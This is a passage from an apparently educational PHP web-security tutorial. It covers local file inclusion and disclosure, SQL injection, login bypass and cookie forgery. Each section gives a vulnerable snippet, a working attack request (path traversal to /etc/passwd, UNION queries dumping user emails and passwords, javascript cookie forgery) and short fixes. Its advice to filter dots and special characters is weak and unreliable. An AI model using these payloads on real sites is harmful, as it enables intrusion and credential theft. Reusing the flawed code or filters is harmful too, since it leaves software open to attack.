left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;The “etc/passwd” file will be succesfully included.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;4.2 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”&lt;br /&gt;Another way : Filter “/” , “\” and “.” .&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5) Local File Disclosure/Download&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;- Tips : Through this vulnerability you can read the content of files,not include.&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;Some functions which let you to read files : &lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;file_get_contents — Reads entire file into a string&lt;br /&gt;readfile — Outputs a file&lt;br /&gt;file — Reads entire file into an array&lt;br /&gt;fopen — Opens file or URL&lt;br /&gt;highlight_file — Syntax highlighting of a file.Prints out or returns a syntax&lt;br /&gt;highlighted version of the code contained in filename using the&lt;br /&gt;colors defined in the built-in syntax highlighter for PHP.&lt;br /&gt;show_source — Alias of highlight_file()&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;5.0 – Basic example&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;- Code snippet from test.php&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$pagina=$_GET[&#39;pagina&#39;];&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;readfile($pagina);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;The readfile() function will read the content of the specified file.So if we do the following request :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;The content of etc/passwd will be outputed NOT included.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;5.1 – Simple example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;-&lt;b&gt; &lt;i&gt;Code snippet from download.php&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;$file = $_SERVER[&quot;DOCUMENT_ROOT&quot;]. $_REQUEST[&#39;file&#39;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;header(“Pragma: public”);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;header(“Expires: 0″);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;header(“Cache-Control: must-revalidate, post-check=0, pre-check=0″);&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;header(“Content-Type: application/force-download”);&lt;br /&gt;header( “Content-Disposition: attachment; filename=”.basename($file));&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;//header( “Content-Description: File Transfer”);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;@readfile($file);&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;die();&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The “file” variable is unsecure.We see in first line that it is requested by $_REQUEST method.&lt;br /&gt;And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.&lt;br /&gt;If we make the following request :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/download.php?file=../../../../../../etc/passwd&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;So we can succesfully read the “etc/passwd” file.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5.2 – How to fix&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”&lt;br /&gt;Another way : Filter “/” , “\” and “.” .&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;6) SQL Injection&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips :&lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt; If the user have file privileges you can read files.&lt;br /&gt;If the user have file privileges and you find a writable directory and magic_quotes_gpc = off&lt;br /&gt;you can upload you code into a file.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;6.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;- Code snippet from test.php&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$id = $_GET[&#39;id&#39;];&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;The “id” variable is not filtered.We can inject our SQL code in “id” variable.Example :&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file(‘etc/passwd’),4–&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;And we get the “etc/passwd” file if magic_quotes = off ( escaping ‘ ) and users have&lt;br /&gt;file privileges.&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;6.1 – Simple example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from house/listing_view.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————————————————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$id = $_GET[&#39;itemnr&#39;];&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;require_once($home.”mysqlinfo.php”);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$query = “SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id”;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$result = mysql_query($query);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;if(mysql_num_rows($result)){&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$r = mysql_fetch_array($result);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————————————————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We see that “id” variable value is the value set for “itemnr” and is not filtered in any way.&lt;br /&gt;So we can inject our code.Lets make a request :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users–&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;And we get the email and the password from the users table.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6.2 – SQL Injection Login Bypass&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from /admin/login.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————————————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$postbruger = $_POST[&#39;username&#39;];&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$postpass = md5($_POST[&#39;password&#39;]);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;or die(“&amp;lt;p&amp;gt;” . mysql_error() . “&amp;lt;/p&amp;gt;\n”);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————————————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :&lt;/b&gt;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;&lt;b&gt;username : admin ‘ or ‘ 1=1&lt;br /&gt;password : sirgod&lt;/b&gt;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;&lt;b&gt;We logged in.Why?Look,the code will become&lt;/b&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1&amp;nbsp; AND password = ‘sirgod’”)&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;————————————————&lt;/b&gt;&lt;/i&gt;———————————————————————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Login bypassed.The username must be an existent username.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6.3 – How to fix&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Simple way :&lt;/span&gt;&lt;i&gt; Don’t allow special chars in variables.For numeric variables&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;use (int) ,example $id=(int)$_GET[&#39;id&#39;];&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Another way : For non-numeric variables : filter all special chars used in&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt; &lt;/i&gt;&lt;/span&gt;SQLI : – , . ( ) ‘ ” _ + / *&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;7) Insecure Cooke Handling&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips :&lt;/b&gt;&lt;/span&gt; &lt;i&gt;&lt;b&gt;Write the code in the URLbar,don’t use a cookie editor for this.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;7.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;if($_POST[&#39;password&#39;] == $thepass) {&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;setcookie(“is_user_logged”,”1″);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;} else { die(“Login failed!”); }&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;………… etc ……………..&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;if($_COOKIE[&#39;is_user_logged&#39;]==”1″)&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;{ include “admin.php”; else { die(‘not logged’); }&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Something interesting here.If we set to the “is_user_logged” variable&lt;br /&gt;from cookie value “1″ we are logged in.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;javascript:document.cookie = “is_user_logged=1; path=/”;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;So practically we are logged in,we pass the check and we can access the admin panel.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;7.1 – Simple example&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from admin.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;if ($_COOKIE[PHPMYBCAdmin] == ”) {&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;if (!$_POST[login] == ‘login’) {&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;die(“Please Login:&amp;lt;BR&amp;gt;&amp;lt;form method=post&amp;gt;&amp;lt;input type=password&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;name=password&amp;gt;&amp;lt;input type=hidden value=login name=login&amp;gt;&amp;lt;input&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;type=submit&amp;gt;&amp;lt;/form&amp;gt;”);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;} elseif($_POST[password] == $bcadminpass) {&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;setcookie(“PHPMYBCAdmin”,”LOGGEDIN”, time() + 60 * 60);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;header(“Location: admin.php”); } else { die(“Incorrect”); }&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;}&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Code looks exploitable.We can set a cookie value that let us to bypass the login&lt;br /&gt;and tell to the script that we are already logged in.Example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;javascript:document.cookie = “PHPMYBCAdmin=LOGGEDIN; path=/”;document.cookie = “1246371700; path=/”;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;What is 1246371700? Is the current time() echo’ed + 360.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;7.2 – How to fix&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Simple way&lt;/b&gt;&lt;/span&gt;:&lt;i&gt;&lt;b&gt; The most simple and eficient way : use SESSIONS .&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8) Remote Command Execution&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips :&lt;/b&gt;&lt;/span&gt; &lt;b&gt;&lt;i&gt;If in script is used exec() you can’t see the command output(but the command is executed)&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;until the result isn’t echo’ed from script.&lt;br /&gt;You can use AND operator ( || ) if the script execute more than one command .&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;In PHP are some functions that let you to execute commands :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;exec — Execute an external program&lt;br /&gt;passthru — Execute an external program and display raw output&lt;br /&gt;shell_exec — Execute command via shell and return the complete output as a string&lt;br /&gt;system — Execute an external program and display the output&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;8.0 – Basic example&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: 